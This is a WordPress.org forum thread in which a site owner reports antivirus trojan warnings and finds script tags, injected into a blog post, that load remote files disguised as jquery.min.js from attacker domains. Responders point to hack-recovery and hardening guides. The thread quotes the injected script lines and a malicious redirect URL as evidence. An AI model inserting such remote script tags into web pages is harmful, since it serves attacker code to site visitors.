WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Security breach? (11 posts)

  1. matthewpaul
    Member
    Posted 4 years ago #

    The last 3 days, when visiting one of my sites (http://www.bullsource.com), I've received an virus warning from Avast containing this info:

    http://edisonsbar.com/in.cgi?4|>{gzip} [L] HTML:RedirME-inf [Trj] (0)

    I've only been able to replicate this once per day. I searched this on Google and found this: http://jsunpack.jeek.org/dec/go?report=226656eee9412647c8c49c892e9473200486e1eb.

    Does anyone know what this means?

  2. matthewpaul
    Member
    Posted 4 years ago #

    I was able to reproduce the issue again.

    When visiting the site, my virus protection program, Avast shows this message:

    TROJAN HORSE BLOCKED

    avast Web Shield has blocked a threat. No further action is required.

    Object: http://edisonsbar.com/in.cgi?4|>{gzip}
    Infection: HTML:RedirME-inf [Trj]
    Action: Connection aborted
    Process: C:\Program Files\Mozilla\Firefox\firefox.exe

    The threat was detected and blocked while downloading an item from the web.

  3. matthewpaul
    Member
    Posted 4 years ago #

    This is happening on one of my other WordPress sites (on the same server). I noticed that this malicious code was being inserted into the index page within the code of the first blog post:

    <h5><script src=http://maroon.karenegren.com/js/jquery.min.js></script></h5>

    and

    <h5><script src=http://yellow.gaindirectory.org/js/jquery.min.js></script></h5>

    I never added this code and it's not in the template file of the theme.

  4. I believe this is part of a current hack that is injecting code into all PHP files (not just WordPress) on a few shared hosting providers. Remain calm and carefully follow this guide:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

  5. matthewpaul
    Member
    Posted 4 years ago #

    My non-WordPress sites (on the same server) are unaffected. I contacted the hosting provider (mt) and they haven't had any other reports of this.

  6. matthewpaul
    Member
    Posted 4 years ago #

    It appears that the hack was injected into the database, not the PHP files. The malicious code was added to a blog post.

  7. Remove the code from the post, then run through this guide to make sure that nothing else is wrong:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    When you're done, implement some (if not all) of the recommended security measures:

    http://codex.wordpress.org/Hardening_WordPress

  8. matthewpaul
    Member
    Posted 4 years ago #

    Do you know of a good plugin to install for security? The recommended ones seem to be outdated and I was experiencing issues with Secure WordPress.

  9. I honestly don't recommend any of them. Most of the current security plugins simply scan for "vulnerabilities" and the rest simply provide a software method of implementing the recommended security measures. If you used a plugin like that, all a hacker would have to do is reset your plugins to drop all of your security measures. It's better to follow the guide that I linked to and manually implement the security measures.

  10. matthewpaul
    Member
    Posted 4 years ago #

    Thanks.

  11. You're welcome!

Topic Closed

This topic has been closed to new replies.

About this Topic